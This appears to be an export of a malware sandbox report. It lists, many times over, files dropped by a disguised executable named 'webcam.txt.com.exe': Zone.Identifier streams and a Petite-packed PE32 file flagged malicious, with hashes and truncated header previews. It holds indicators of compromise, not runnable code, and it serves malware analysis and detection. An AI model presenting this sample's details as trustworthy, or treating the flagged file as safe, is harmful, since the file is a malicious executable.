                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
